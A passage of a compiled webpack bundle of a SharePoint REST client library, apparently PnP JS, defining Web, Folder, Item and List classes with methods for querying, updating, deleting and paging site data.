* * @param url */ Web.fromUrl = function (url, path) { if (url === null) { return new Web(""); } var index = url.indexOf("_api/"); if (index > -1) { return new Web(url.substr(0, index), path); } return new Web(url, path); }; Object.defineProperty(Web.prototype, "webs", { get: function () { return new Webs(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "webinfos", { get: function () { return new WebInfos(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "contentTypes", { /** * Get the content types available in this web * */ get: function () { return new contenttypes_1.ContentTypes(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "lists", { /** * Get the lists in this web * */ get: function () { return new lists_1.Lists(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "fields", { /** * Gets the fields in this web * */ get: function () { return new fields_1.Fields(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "features", { /** * Gets the active features for this web * */ get: function () { return new features_1.Features(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "availablefields", { /** * Gets the available fields in this web * */ get: function () { return new fields_1.Fields(this, "availablefields"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "navigation", { /** * Get the navigation options in this web * */ get: function () { return new navigation_1.Navigation(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "siteUsers", { /** * Gets the site users * */ get: function () { return new siteusers_1.SiteUsers(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "siteGroups", { /** * Gets the site groups * */ get: function () { return new sitegroups_1.SiteGroups(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "currentUser", { /** * Gets the current user */ get: function () { return new siteusers_1.CurrentUser(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "folders", { /** * Get the folders in this web * */ get: function () { return new folders_1.Folders(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "userCustomActions", { /** * Get all custom actions on a site * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "roleDefinitions", { /** * Gets the collection of RoleDefinition resources. 
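*
* For illustration (assumes a Web instance named "web"):
* @example
* web.roleDefinitions.get().then(function (defs) { console.log(defs); });
*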
* */ get: function () { return new roles_1.RoleDefinitions(this); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "relatedItems", { /** * Provides an interface to manage related items * */ get: function () { return relateditems_1.RelatedItemManagerImpl.FromUrl(this.toUrl()); }, enumerable: true, configurable: true }); /** * Creates a new batch for requests within the context of context this web * */ Web.prototype.createBatch = function () { return new odata_1.ODataBatch(this.parentUrl); }; Object.defineProperty(Web.prototype, "rootFolder", { /** * The root folder of the web */ get: function () { return new folders_1.Folder(this, "rootFolder"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedOwnerGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedownergroup"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedMemberGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedmembergroup"); }, enumerable: true, configurable: true }); Object.defineProperty(Web.prototype, "associatedVisitorGroup", { get: function () { return new sitegroups_1.SiteGroup(this, "associatedvisitorgroup"); }, enumerable: true, configurable: true }); /** * Get a folder by server relative url * * @param folderRelativeUrl the server relative path to the folder (including /sites/ if applicable) */ Web.prototype.getFolderByServerRelativeUrl = function (folderRelativeUrl) { return new folders_1.Folder(this, "getFolderByServerRelativeUrl('" + folderRelativeUrl + "')"); }; /** * Get a file by server relative url * * @param fileRelativeUrl the server relative path to the file (including /sites/ if applicable) */ Web.prototype.getFileByServerRelativeUrl = function (fileRelativeUrl) { return new files_1.File(this, "getFileByServerRelativeUrl('" + fileRelativeUrl + "')"); }; /** * Get a list by server relative url (list's root folder) * * @param listRelativeUrl the server relative path to the list's root folder (including /sites/ if applicable) */ Web.prototype.getList = function (listRelativeUrl) { return new lists_2.List(this, "getList('" + listRelativeUrl + "')"); }; /** * Updates this web intance with the supplied properties * * @param properties A plain object hash of values to update for the web */ Web.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Web" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, web: _this, }; }); }; /** * Delete this web * */ Web.prototype.delete = function () { return _super.prototype.delete.call(this); }; /** * Applies the theme specified by the contents of each of the files specified in the arguments to the site. * * @param colorPaletteUrl Server-relative URL of the color palette file. * @param fontSchemeUrl Server-relative URL of the font scheme. * @param backgroundImageUrl Server-relative URL of the background image. * @param shareGenerated true to store the generated theme files in the root site, or false to store them in this site. 
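*
* An illustrative call; the catalog urls are placeholders, and passing null to skip
* the background image is an assumption rather than documented behavior:
* @example
* web.applyTheme("/sites/dev/_catalogs/theme/15/palette011.spcolor",
*     "/sites/dev/_catalogs/theme/15/fontscheme003.spfont",
*     null, true);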
*/ Web.prototype.applyTheme = function (colorPaletteUrl, fontSchemeUrl, backgroundImageUrl, shareGenerated) { var postBody = JSON.stringify({ backgroundImageUrl: backgroundImageUrl, colorPaletteUrl: colorPaletteUrl, fontSchemeUrl: fontSchemeUrl, shareGenerated: shareGenerated, }); return this.clone(Web, "applytheme", true).post({ body: postBody }); }; /** * Applies the specified site definition or site template to the Web site that has no template applied to it. * * @param template Name of the site definition or the name of the site template */ Web.prototype.applyWebTemplate = function (template) { var q = this.clone(Web, "applywebtemplate", true); q.concat("(@t)"); q.query.add("@t", template); return q.post(); }; /** * Returns whether the current user has the given set of permissions. * * @param perms The high and low permission range. */ Web.prototype.doesUserHavePermissions = function (perms) { var q = this.clone(Web, "doesuserhavepermissions", true); q.concat("(@p)"); q.query.add("@p", JSON.stringify(perms)); return q.get(); }; /** * Checks whether the specified login name belongs to a valid user in the site. If the user doesn't exist, adds the user to the site. * * @param loginName The login name of the user (ex: i:0#.f|membership|[email protected]) */ Web.prototype.ensureUser = function (loginName) { var postBody = JSON.stringify({ logonName: loginName, }); return this.clone(Web, "ensureuser", true).post({ body: postBody }).then(function (data) { return { data: data, user: new siteusers_1.SiteUser(odata_1.extractOdataId(data)), }; }); }; /** * Returns a collection of site templates available for the site. * * @param language The LCID of the site templates to get. * @param true to include language-neutral site templates; otherwise false */ Web.prototype.availableWebTemplates = function (language, includeCrossLanugage) { if (language === void 0) { language = 1033; } if (includeCrossLanugage === void 0) { includeCrossLanugage = true; } return new queryable_1.QueryableCollection(this, "getavailablewebtemplates(lcid=" + language + ", doincludecrosslanguage=" + includeCrossLanugage + ")"); }; /** * Returns the list gallery on the site. * * @param type The gallery type - WebTemplateCatalog = 111, WebPartCatalog = 113 ListTemplateCatalog = 114, * MasterPageCatalog = 116, SolutionCatalog = 121, ThemeCatalog = 123, DesignCatalog = 124, AppDataCatalog = 125 */ Web.prototype.getCatalog = function (type) { return this.clone(Web, "getcatalog(" + type + ")", true).select("Id").get().then(function (data) { return new lists_2.List(odata_1.extractOdataId(data)); }); }; /** * Returns the collection of changes from the change log that have occurred within the list, based on the specified query. */ Web.prototype.getChanges = function (query) { var postBody = JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeQuery" } }, query) }); return this.clone(Web, "getchanges", true).post({ body: postBody }); }; Object.defineProperty(Web.prototype, "customListTemplate", { /** * Gets the custom list templates for the site. * */ get: function () { return new queryable_1.QueryableCollection(this, "getcustomlisttemplates"); }, enumerable: true, configurable: true }); /** * Returns the user corresponding to the specified member identifier for the current site. * * @param id The ID of the user. 
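*
* For illustration (user id 4 is a placeholder; "web" is an assumed Web instance):
* @example
* web.getUserById(4).get().then(function (user) { console.log(user); });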
*/ Web.prototype.getUserById = function (id) { return new siteusers_1.SiteUser(this, "getUserById(" + id + ")"); }; /** * Returns the name of the image file for the icon that is used to represent the specified file. * * @param filename The file name. If this parameter is empty, the server returns an empty string. * @param size The size of the icon: 16x16 pixels = 0, 32x32 pixels = 1. * @param progId The ProgID of the application that was used to create the file, in the form OLEServerName.ObjectName */ Web.prototype.mapToIcon = function (filename, size, progId) { if (size === void 0) { size = 0; } if (progId === void 0) { progId = ""; } return this.clone(Web, "maptoicon(filename='" + filename + "', progid='" + progId + "', size=" + size + ")", true).get(); }; return Web; }(queryableshareable_1.QueryableShareableWeb)); __decorate([ decorators_1.deprecated("This method will be removed in future releases. Please use the methods found in queryable securable.") ], Web.prototype, "doesUserHavePermissions", null); exports.Web = Web; /***/ }), /* 9 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var queryableshareable_1 = __webpack_require__(12); var files_1 = __webpack_require__(7); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var items_1 = __webpack_require__(10); /** * Describes a collection of Folder objects * */ var Folders = (function (_super) { __extends(Folders, _super); /** * Creates a new instance of the Folders class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Folders(baseUrl, path) { if (path === void 0) { path = "folders"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a folder by folder name * */ Folders.prototype.getByName = function (name) { var f = new Folder(this); f.concat("('" + name + "')"); return f; }; /** * Adds a new folder to the current folder (relative) or any folder (absolute) * * @param url The relative or absolute url where the new folder will be created. Urls starting with a forward slash are absolute. * @returns The new Folder and the raw response. */ Folders.prototype.add = function (url) { var _this = this; return this.clone(Folders, "add('" + url + "')", true).post().then(function (response) { return { data: response, folder: _this.getByName(url), }; }); }; return Folders; }(queryable_1.QueryableCollection)); exports.Folders = Folders; /** * Describes a single Folder instance * */ var Folder = (function (_super) { __extends(Folder, _super); function Folder() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(Folder.prototype, "contentTypeOrder", { /** * Specifies the sequence in which content types are displayed. 
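*
* A sketch reading the order for a library's root folder (the path is a placeholder):
* @example
* web.getFolderByServerRelativeUrl("/sites/dev/Shared Documents")
*     .contentTypeOrder.get()
*     .then(function (order) { console.log(order); });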
* */ get: function () { return new queryable_1.QueryableCollection(this, "contentTypeOrder"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "files", { /** * Gets this folder's files * */ get: function () { return new files_1.Files(this); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "folders", { /** * Gets this folder's sub folders * */ get: function () { return new Folders(this); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "listItemAllFields", { /** * Gets this folder's list item field values * */ get: function () { return new queryable_1.QueryableCollection(this, "listItemAllFields"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "parentFolder", { /** * Gets the parent folder, if available * */ get: function () { return new Folder(this, "parentFolder"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "properties", { /** * Gets this folder's properties * */ get: function () { return new queryable_1.QueryableInstance(this, "properties"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "serverRelativeUrl", { /** * Gets this folder's server relative url * */ get: function () { return new queryable_1.Queryable(this, "serverRelativeUrl"); }, enumerable: true, configurable: true }); Object.defineProperty(Folder.prototype, "uniqueContentTypeOrder", { /** * Gets a value that specifies the content type order. * */ get: function () { return new queryable_1.QueryableCollection(this, "uniqueContentTypeOrder"); }, enumerable: true, configurable: true }); Folder.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Folder" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, folder: _this, }; }); }; /** * Delete this folder * * @param eTag Value used in the IF-Match header, by default "*" */ Folder.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.clone(Folder, null, true).post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Moves the folder to the Recycle Bin and returns the identifier of the new Recycle Bin item. */ Folder.prototype.recycle = function () { return this.clone(Folder, "recycle", true).post(); }; /** * Gets the associated list item for this folder, loading the default properties */ Folder.prototype.getItem = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } var q = this.listItemAllFields; return q.select.apply(q, selects).get().then(function (d) { return util_1.Util.extend(new items_1.Item(odata_1.getEntityUrl(d)), d); }); }; return Folder; }(queryableshareable_1.QueryableShareableFolder)); exports.Folder = Folder; /***/ }), /* 10 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var queryableshareable_1 = __webpack_require__(12); var folders_1 = __webpack_require__(9); var files_1 = __webpack_require__(7); var contenttypes_1 = __webpack_require__(16); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var attachmentfiles_1 = __webpack_require__(42); var lists_1 = __webpack_require__(11); /** * Describes a collection of Item objects * */ var Items = (function (_super) { __extends(Items, _super); /** * Creates a new instance of the Items class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Items(baseUrl, path) { if (path === void 0) { path = "items"; } return _super.call(this, baseUrl, path) || this; } /** * Gets an Item by id * * @param id The integer id of the item to retrieve */ Items.prototype.getById = function (id) { var i = new Item(this); i.concat("(" + id + ")"); return i; }; /** * Skips the specified number of items (https://msdn.microsoft.com/en-us/library/office/fp142385.aspx#sectionSection6) * * @param skip The starting id where the page should start, use with top to specify pages */ Items.prototype.skip = function (skip) { this._query.add("$skiptoken", encodeURIComponent("Paged=TRUE&p_ID=" + skip)); return this; }; /** * Gets a collection designed to aid in paging through data * */ Items.prototype.getPaged = function () { return this.getAs(new PagedItemCollectionParser()); }; // /** * Adds a new item to the collection * * @param properties The new items's properties */ Items.prototype.add = function (properties, listItemEntityTypeFullName) { var _this = this; if (properties === void 0) { properties = {}; } if (listItemEntityTypeFullName === void 0) { listItemEntityTypeFullName = null; } var removeDependency = this.addBatchDependency(); return this.ensureListItemEntityTypeName(listItemEntityTypeFullName).then(function (listItemEntityType) { var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": listItemEntityType }, }, properties)); var promise = _this.clone(Items, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, item: _this.getById(data.Id), }; }); removeDependency(); return promise; }); }; /** * Ensures we have the proper list item entity type name, either from the value provided or from the list * * @param candidatelistItemEntityTypeFullName The potential type name */ Items.prototype.ensureListItemEntityTypeName = function (candidatelistItemEntityTypeFullName) { return candidatelistItemEntityTypeFullName ? 
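// --- Usage sketch (illustrative comment only). Adding an item through the Items
// collection defined above; the "Title" field is an assumed example column:
//
//   list.items.add({ Title: "New task" }).then(function (r) {
//       return r.item.select("Id", "Title").get();
//   }).then(function (data) { console.log(data); });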
Promise.resolve(candidatelistItemEntityTypeFullName) : this.getParent(lists_1.List).getListItemEntityTypeFullName(); }; return Items; }(queryable_1.QueryableCollection)); exports.Items = Items; /** * Describes a single Item instance * */ var Item = (function (_super) { __extends(Item, _super); function Item() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(Item.prototype, "attachmentFiles", { /** * Gets the set of attachments for this item * */ get: function () { return new attachmentfiles_1.AttachmentFiles(this); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "contentType", { /** * Gets the content type for this item * */ get: function () { return new contenttypes_1.ContentType(this, "ContentType"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "effectiveBasePermissions", { /** * Gets the effective base permissions for the item * */ get: function () { return new queryable_1.Queryable(this, "EffectiveBasePermissions"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "effectiveBasePermissionsForUI", { /** * Gets the effective base permissions for the item in a UI context * */ get: function () { return new queryable_1.Queryable(this, "EffectiveBasePermissionsForUI"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesAsHTML", { /** * Gets the field values for this list item in their HTML representation * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesAsHTML"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesAsText", { /** * Gets the field values for this list item in their text representation * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesAsText"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesForEdit", { /** * Gets the field values for this list item for use in editing controls * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesForEdit"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "folder", { /** * Gets the folder associated with this list item (if this item represents a folder) * */ get: function () { return new folders_1.Folder(this, "folder"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "file", { /** * Gets the file associated with this list item (if this item represents a file) * */ get: function () { return new files_1.File(this, "file"); }, enumerable: true, configurable: true }); /** * Updates this list item instance with the supplied properties * * @param properties A plain object hash of values to update for the list item * @param eTag Value used in the IF-Match header, by default "*" */ Item.prototype.update = function (properties, eTag) { var _this = this; if (eTag === void 0) { eTag = "*"; } return new Promise(function (resolve, reject) { var removeDependency = _this.addBatchDependency(); var parentList = _this.getParent(queryable_1.QueryableInstance, _this.parentUrl.substr(0, _this.parentUrl.lastIndexOf("/"))); parentList.select("ListItemEntityTypeFullName").getAs().then(function (d) { var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": d.ListItemEntityTypeFullName }, }, properties)); removeDependency(); return _this.post({ body: postBody, headers: { "IF-Match": eTag, "X-HTTP-Method": "MERGE", }, }, new
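// --- Usage sketch (illustrative comment only). Calling the update method being
// defined here; "Title" is an assumed example column and "*" is the default eTag:
//
//   list.items.getById(1).update({ Title: "Renamed" }, "*").then(function (r) {
//       console.log(r.data["odata.etag"]); // etag parsed by ItemUpdatedParser below
//   });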
ItemUpdatedParser()).then(function (data) { resolve({ data: data, item: _this, }); }); }).catch(function (e) { return reject(e); }); }); }; /** * Delete this item * * @param eTag Value used in the IF-Match header, by default "*" */ Item.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Moves the list item to the Recycle Bin and returns the identifier of the new Recycle Bin item. */ Item.prototype.recycle = function () { return this.clone(Item, "recycle", true).post(); }; /** * Gets a string representation of the full URL to the WOPI frame. * If there is no associated WOPI application, or no associated action, an empty string is returned. * * @param action Display mode: 0: view, 1: edit, 2: mobileView, 3: interactivePreview */ Item.prototype.getWopiFrameUrl = function (action) { if (action === void 0) { action = 0; } var i = this.clone(Item, "getWOPIFrameUrl(@action)", true); i._query.add("@action", action); return i.post().then(function (data) { return data.GetWOPIFrameUrl; }); }; /** * Validates and sets the values of the specified collection of fields for the list item. * * @param formValues The fields to change and their new values. * @param newDocumentUpdate true if the list item is a document being updated after upload; otherwise false. */ Item.prototype.validateUpdateListItem = function (formValues, newDocumentUpdate) { if (newDocumentUpdate === void 0) { newDocumentUpdate = false; } return this.clone(Item, "validateupdatelistitem", true).post({ body: JSON.stringify({ "formValues": formValues, bNewDocumentUpdate: newDocumentUpdate }), }); }; return Item; }(queryableshareable_1.QueryableShareableItem)); exports.Item = Item; /** * Provides paging functionality for list items */ var PagedItemCollection = (function () { function PagedItemCollection(nextUrl, results) { this.nextUrl = nextUrl; this.results = results; } Object.defineProperty(PagedItemCollection.prototype, "hasNext", { /** * If true there are more results available in the set, otherwise there are not */ get: function () { return typeof this.nextUrl === "string" && this.nextUrl.length > 0; }, enumerable: true, configurable: true }); /** * Gets the next set of results, or resolves to null if no results are available */ PagedItemCollection.prototype.getNext = function () { if (this.hasNext) { var items = new Items(this.nextUrl, null); return items.getPaged(); } return new Promise(function (r) { return r(null); }); }; return PagedItemCollection; }()); exports.PagedItemCollection = PagedItemCollection; var PagedItemCollectionParser = (function (_super) { __extends(PagedItemCollectionParser, _super); function PagedItemCollectionParser() { return _super !== null && _super.apply(this, arguments) || this; } PagedItemCollectionParser.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { r.json().then(function (json) { var nextUrl = json.hasOwnProperty("d") && json.d.hasOwnProperty("__next") ? 
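// --- Usage sketch (illustrative comment only). Walking result pages with the
// PagedItemCollection defined above; the page size of 50 is an assumed example:
//
//   list.items.top(50).getPaged().then(function processPage(page) {
//       console.log(page.results.length);
//       if (page.hasNext) { page.getNext().then(processPage); }
//   });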
json.d.__next : json["odata.nextLink"]; resolve(new PagedItemCollection(nextUrl, _this.parseODataJSON(json))); }); } }); }; return PagedItemCollectionParser; }(odata_1.ODataParserBase)); var ItemUpdatedParser = (function (_super) { __extends(ItemUpdatedParser, _super); function ItemUpdatedParser() { return _super !== null && _super.apply(this, arguments) || this; } ItemUpdatedParser.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { resolve({ "odata.etag": r.headers.get("etag"), }); } }); }; return ItemUpdatedParser; }(odata_1.ODataParserBase)); /***/ }), /* 11 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var items_1 = __webpack_require__(10); var views_1 = __webpack_require__(49); var contenttypes_1 = __webpack_require__(16); var fields_1 = __webpack_require__(24); var forms_1 = __webpack_require__(43); var subscriptions_1 = __webpack_require__(47); var queryable_1 = __webpack_require__(1); var queryablesecurable_1 = __webpack_require__(26); var util_1 = __webpack_require__(0); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var exceptions_1 = __webpack_require__(3); var folders_1 = __webpack_require__(9); /** * Describes a collection of List objects * */ var Lists = (function (_super) { __extends(Lists, _super); /** * Creates a new instance of the Lists class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Lists(baseUrl, path) { if (path === void 0) { path = "lists"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a list from the collection by title * * @param title The title of the list */ Lists.prototype.getByTitle = function (title) { return new List(this, "getByTitle('" + title + "')"); }; /** * Gets a list from the collection by guid id * * @param id The Id of the list (GUID) */ Lists.prototype.getById = function (id) { var list = new List(this); list.concat("('" + id + "')"); return list; }; /** * Adds a new list to the collection * * @param title The new list's title * @param description The new list's description * @param template The list template value * @param enableContentTypes If true content types will be allowed and enabled, otherwise they will be disallowed and not enabled * @param additionalSettings Will be passed as part of the list creation body */ Lists.prototype.add = function (title, description, template, enableContentTypes, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (template === void 0) { template = 100; } if (enableContentTypes === void 0) { enableContentTypes = false; } if (additionalSettings === void 0) { additionalSettings = {}; } var addSettings = util_1.Util.extend({ "AllowContentTypes": enableContentTypes, "BaseTemplate": template, "ContentTypesEnabled": enableContentTypes, "Description": description, "Title": title, "__metadata": { "type": "SP.List" }, }, additionalSettings); return this.post({ 
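// --- Usage sketch (illustrative comment only). Resolving lists from the Lists
// collection defined above; the title and GUID are assumed example values:
//
//   lists.getByTitle("Documents").select("Title", "ItemCount").get();
//   lists.getById("f6b5c6a0-0000-0000-0000-000000000000").get();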
body: JSON.stringify(addSettings) }).then(function (data) { return { data: data, list: _this.getByTitle(addSettings.Title) }; }); }; /** * Ensures that the specified list exists in the collection (note: this method not supported for batching) * * @param title The new list's title * @param description The new list's description * @param template The list template value * @param enableContentTypes If true content types will be allowed and enabled, otherwise they will be disallowed and not enabled * @param additionalSettings Will be passed as part of the list creation body or used to update an existing list */ Lists.prototype.ensure = function (title, description, template, enableContentTypes, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (template === void 0) { template = 100; } if (enableContentTypes === void 0) { enableContentTypes = false; } if (additionalSettings === void 0) { additionalSettings = {}; } if (this.hasBatch) { throw new exceptions_1.NotSupportedInBatchException("The ensure list method"); } return new Promise(function (resolve, reject) { var addOrUpdateSettings = util_1.Util.extend(additionalSettings, { Title: title, Description: description, ContentTypesEnabled: enableContentTypes }, true); var list = _this.getByTitle(addOrUpdateSettings.Title); list.get().then(function (_) { list.update(addOrUpdateSettings).then(function (d) { resolve({ created: false, data: d, list: _this.getByTitle(addOrUpdateSettings.Title) }); }).catch(function (e) { return reject(e); }); }).catch(function (_) { _this.add(title, description, template, enableContentTypes, addOrUpdateSettings).then(function (r) { resolve({ created: true, data: r.data, list: _this.getByTitle(addOrUpdateSettings.Title) }); }).catch(function (e) { return reject(e); }); }); }); }; /** * Gets a list that is the default asset location for images or other files, which the users upload to their wiki pages. */ Lists.prototype.ensureSiteAssetsLibrary = function () { return this.clone(Lists, "ensuresiteassetslibrary", true).post().then(function (json) { return new List(odata_1.extractOdataId(json)); }); }; /** * Gets a list that is the default location for wiki pages. 
*/ Lists.prototype.ensureSitePagesLibrary = function () { return this.clone(Lists, "ensuresitepageslibrary", true).post().then(function (json) { return new List(odata_1.extractOdataId(json)); }); }; return Lists; }(queryable_1.QueryableCollection)); exports.Lists = Lists; /** * Describes a single List instance * */ var List = (function (_super) { __extends(List, _super); function List() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(List.prototype, "contentTypes", { /** * Gets the content types in this list * */ get: function () { return new contenttypes_1.ContentTypes(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "items", { /** * Gets the items in this list * */ get: function () { return new items_1.Items(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "views", { /** * Gets the views in this list * */ get: function () { return new views_1.Views(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "fields", { /** * Gets the fields in this list * */ get: function () { return new fields_1.Fields(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "forms", { /** * Gets the forms in this list * */ get: function () { return new forms_1.Forms(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "defaultView", { /** * Gets the default view of this list * */ get: function () { return new queryable_1.QueryableInstance(this, "DefaultView"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "userCustomActions", { /** * Get all custom actions on a site collection * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "effectiveBasePermissions", { /** * Gets the effective base permissions of this list * */ get: function () { return new queryable_1.Queryable(this, "EffectiveBasePermissions"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "eventReceivers", { /** * Gets the event receivers attached to this list * */ get: function () { return new queryable_1.QueryableCollection(this, "EventReceivers"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "relatedFields", { /** * Gets the related fields of this list * */ get: function () { return new queryable_1.Queryable(this, "getRelatedFields"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "informationRightsManagementSettings", { /** * Gets the IRM settings for this list * */ get: function () { return new queryable_1.Queryable(this, "InformationRightsManagementSettings"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "subscriptions", { /** * Gets the webhook subscriptions of this list * */ get: function () { return new subscriptions_1.Subscriptions(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "rootFolder", { /** * The root folder of the list */ get: function () { return new folders_1.Folder(this, "rootFolder"); }, enumerable: true, configurable: true }); /** * Gets a view by view guid id * */ List.prototype.getView = function (viewId) { return new views_1.View(this, "getView('" + viewId + "')"); }; /** * Updates this list intance with the supplied properties * * @param properties A plain object hash of 
values to update for the list * @param eTag Value used in the IF-Match header, by default "*" */ /* tslint:disable no-string-literal */ List.prototype.update = function (properties, eTag) { var _this = this; if (eTag === void 0) { eTag = "*"; } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.List" }, }, properties)); return this.post({ body: postBody, headers: { "IF-Match": eTag, "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retList = _this; if (properties.hasOwnProperty("Title")) { retList = _this.getParent(List, _this.parentUrl, "getByTitle('" + properties["Title"] + "')"); } return { data: data, list: retList, }; }); }; /* tslint:enable */ /** * Delete this list * * @param eTag Value used in the IF-Match header, by default "*" */ List.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Returns the collection of changes from the change log that have occurred within the list, based on the specified query. */ List.prototype.getChanges = function (query) { return this.clone(List, "getchanges", true).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeQuery" } }, query) }), }); }; /** * Returns a collection of items from the list based on the specified query. * * @param CamlQuery The Query schema of Collaborative Application Markup * Language (CAML) is used in various ways within the context of Microsoft SharePoint Foundation * to define queries against list data. * see: * * https://msdn.microsoft.com/en-us/library/office/ms467521.aspx * * @param expands A URI with a $expand System Query Option indicates that Entries associated with * the Entry or Collection of Entries identified by the Resource Path * section of the URI must be represented inline (i.e. eagerly loaded). * see: * * https://msdn.microsoft.com/en-us/library/office/fp142385.aspx * * http://www.odata.org/documentation/odata-version-2-0/uri-conventions/#ExpandSystemQueryOption */ 